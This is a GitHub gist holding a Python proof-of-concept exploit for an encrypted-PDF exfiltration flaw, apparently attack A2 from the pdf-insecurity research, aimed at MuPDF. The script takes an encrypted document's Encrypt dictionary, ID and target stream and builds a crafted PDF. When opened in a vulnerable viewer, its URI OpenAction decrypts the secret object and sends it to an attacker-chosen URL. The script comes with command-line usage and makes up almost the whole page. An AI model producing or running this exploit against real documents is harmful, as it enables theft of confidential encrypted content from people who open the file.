Skip to content

Instantly share code, notes, and snippets.

@Areizen

Areizen/mupdf_encrypted_exfiltration.py

Created April 30, 2020 17:48
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Areizen/272cba5f295e2d44172a4936e860d0b0 to your computer and use it in GitHub Desktop.
Save Areizen/272cba5f295e2d44172a4936e860d0b0 to your computer and use it in GitHub Desktop.
Download ZIP
POC of pdf-insecurity.com
Raw
mupdf_encrypted_exfiltration.py
from binascii import hexlify
import sys
import re
# PDF TEMPLATE, index number should be shifted enough to avoid collision with number of the object
# we want to exfiltrate
PDF_TEMPLATE = """%PDF-2.0
100 0 obj
<< /Type /Catalog
/Pages 200 0 R
/URI << /Base 800 0 R >>
/ViewerPreferences << /DisplayDocTitle true >>
/OpenAction 700 0 R
>>
endobj
200 0 obj
<< /Type /Pages
/Kids [300 0 R]
/Count 1
/MediaBox [0 0 595 842]
>>
endobj
300 0 obj
<< /Type /Page
/Parent 200 0 R
/Resources << /Font << /F1 << /Type /Font /Subtype /Type1 /BaseFont /Courier >> >> >>
/Annots [500 0 R 600 0 R]
/Contents [400 0 R]
>>
endobj
400 0 obj
<< /Length 112 >>
stream
����*aTDGT��#M���e|���(���\�
�"�ᖬ@���-��G�x,P�ɢ5���Q�8��~<��-�my��T ����endstream
endobj
500 0 obj
<< /Type /Annot
/Subtype /FreeText
/BS << /S /S /W 0 >>
/Rect [90 620 500 720] /F 4
/DA <f86595e63163e1c2e0a86f578b25cd64d1260e7336190d87aba1f008912a1061541744475480da234df9a7d6657c83eb7f16a628b5b7a15ce30cf5228ce196ac4092dc1bb9ae2df5a647c8782c135084c9a2359cf013e05117ee38c0a27b7e3c01b0822ddc6d79169ec65409d0f9bab7>
/Contents 800 0 R
>>
endobj
600 0 obj
<< /Type /Annot
/Subtype /Link
/Open true
/Rect [0 0 595 600]
/A 700 0 R
/H /N
>>
endobj
700 0 obj
<< /Type /Action
/S /URI
/URI {stream_obj_number} 0 R
>>
endobj
800 0 obj
({url_exfiltration})
endobj
{stream_obj_number} 0 obj
<{stream_content_hex_encoded}> % = enc(SECRET)
endobj
1000 0 obj
{encrypt_obj}
endobj
xref
0 11
0000000000 65535 f
000000001000 00000 n
000000017200 00000 n
000000027300 00000 n
000000047100 00000 n
000000063600 00000 n
000000101500 00000 n
0000001140 00000 n
0000001209 00000 n
000000125300 00000 n
000000135200 00000 n
trailer
<< /Root 100 0 R
/Size 11
/Encrypt 1000 0 R
/ID {random_id}
/Info << /Title 800 0 R >>
>>
startxref
1940
%%EOF
"""
REGEX_ENCRYPT = rb"obj\n(?P<encrypt_obj><<\/Filter\/Standard(.*?)>>)\nendobj"
REGEX_STREAM = rb"\s\d+ obj\n<<.*?>>\sstream\n(?P<stream>.*?)\nendstream\nendobj"
REGEX_ID = rb"\/ID.*?(?P<id>\[.*?])"
def main(pdf, obj_n, url_exfiltration, output):
"""
Generate a pdf that exploit A2 vuln described in https://pdf-insecurity.org/
:params pdf: a pdf for which you do not have the key
:params obj_n: the obj you want to decrypt
:params url_exfiltration: the URL to decrypt
:params output: the output pdf path
"""
# opening the encrypted_pdf
encrypted_pdf = open(pdf, "rb").read()
# extract all useful informations
encrypt = re.search(REGEX_ENCRYPT, encrypted_pdf, re.MULTILINE | re.DOTALL).group("encrypt_obj")
stream = re.search(obj_n.encode() + REGEX_STREAM, encrypted_pdf, re.MULTILINE | re.DOTALL).group("stream")
id_part = re.search(REGEX_ID, encrypted_pdf,re.MULTILINE | re.DOTALL).group("id")
stream = hexlify(stream)
print(stream)
print(encrypt)
print(id_part)
output_pdf = PDF_TEMPLATE.format(stream_obj_number=obj_n, random_id = id_part.decode(),encrypt_obj = encrypt.decode(),stream_content_hex_encoded = stream.decode(),url_exfiltration = url_exfiltration)
open(output,"w").write(output_pdf)
if __name__ == '__main__':
if len(sys.argv) != 5:
print(f"[-] Usage : {sys.argv[0]} <pdf_to_spoof> <object_no_to_decrypt> <url_exfiltration> <output_pdf>")
sys.exit(-1)
main(pdf=sys.argv[1],obj_n=sys.argv[2],url_exfiltration=sys.argv[3],output=sys.argv[4])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment